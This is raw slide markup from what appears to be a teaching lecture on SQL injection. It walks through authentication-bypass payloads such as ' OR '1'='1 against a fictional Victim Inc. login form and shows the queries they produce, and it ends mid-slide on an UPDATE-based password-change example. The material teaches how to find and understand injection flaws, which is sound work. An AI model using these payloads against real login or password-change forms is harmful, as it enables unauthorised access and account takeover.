            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Presentation tier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>(Web browser), </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Middle tier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>(Web server, application server), </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Storage tier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>(database server). </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The Web browser sends requests to the middle tier which services the requests by making queries and updates against the database.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="image"/>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lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 4" descr="image"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1831975" y="7938"/>
            <a:ext cx="304800" cy="304801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 6" descr="image"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1984375" y="160338"/>
            <a:ext cx="304800" cy="304801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>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1" y="4724400"/>
            <a:ext cx="5867799" cy="1971675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Blind Injection Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1219200"/>
            <a:ext cx="8839200" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Blind SQL injection is a vulnerability that arises when the Web application does not return any results of the query and simply displays the page as normal, or may be with a small difference in what you get back</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Finding such vulnerability usually requires that you inject a SQL statement that has a side effect (more on this topic in our next lecture).</a:t>
            </a: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Confirming SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>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792162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1295400"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Once you receive a response from the server and identify an anomaly you will always need to confirm the SQL injection vulnerability by crafting a valid SQL statement.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Note that each application is different and every SQL injection point is therefore unique. This means you will always need to follow an educated trial-and-error process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Two types of SQL injection:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Inline injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Injection terminating a SQL statement</a:t>
            </a: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715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Inline SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="762000"/>
            <a:ext cx="8610600" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Inline injection: SQL code injected in such a way that all parts of the original query are executed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: Victim Inc. has an authentication form for accessing the administration part of its Web site. After sending a username and password, the application sends a query to the database to validate the user:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ‘[USER ENTRY]’ AND password = ‘[USER ENTRY]’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The application doesn’t perform any sanitization of the received data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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7574" y="1676401"/>
            <a:ext cx="4724400" cy="1228725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Injecting Strings Inline</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="914400"/>
            <a:ext cx="8763000" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In this case, we assume we are attacking a string value because a username is usually represented by a string and because injecting a quote returned an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unclosed quotation mark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> error. Due to these reasons we are going to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR ‘1’=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in the username field, leaving the password blank. The entry will result in the following SQL statement:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ” OR ‘1’=‘1’ AND password = ”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This statement will not have the intended results. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> has a higher priority than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, and therefore we could rewrite the SQL statement as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE (username = ’’) OR (‘1’=‘1’ AND password = ’’);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This is not what we wanted to do, as this will return only the rows in the administrators table that contain a blank username or password. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can change this behaviour by injecting:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR 1=1 OR ’1’=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE (username = ’’) OR (1=1) OR (‘1’=‘1’ AND password = ’’);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> condition makes the statement always return true, and therefore we might bypass the authentication process. </a:t>
            </a:r>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GB" dirty="0"/>
              <a:t>Injecting Strings Inline</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="914400"/>
            <a:ext cx="8915400" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some authentication mechanisms cannot be bypassed by returning every row in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> table; they might require just one row to be returned. For those scenarios, you may want to try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin’ AND ’1’=’1’ OR ’1’=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, resulting in:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE (username = ‘admin’ AND 1=1) OR (‘1’=‘1’ AND password = ’’);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The preceding statement will return only one row whose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> equals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can also inject a true condition such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ OR ’1‘=’1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE (username = ’’ AND password = ’’) OR (‘1’=‘1’);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This statement will return all content from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> table, thereby successfully exploiting the vulnerability.</a:t>
            </a:r>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198438"/>
            <a:ext cx="8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Injecting Strings Inline</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="914400"/>
            <a:ext cx="8915400" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All the examples shown so far were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> queries. Imagine a typical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Change</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> functionality on the Victim Inc. website where the user has to enter their old password for confirmation, and supply a new one:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE users</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SET password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ‘Bob’ AND password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>old_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Now, if Bob discovers a SQL injection issue affecting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>old password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> field and injects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ OR ‘1’=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> the query would be:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE users</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SET password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
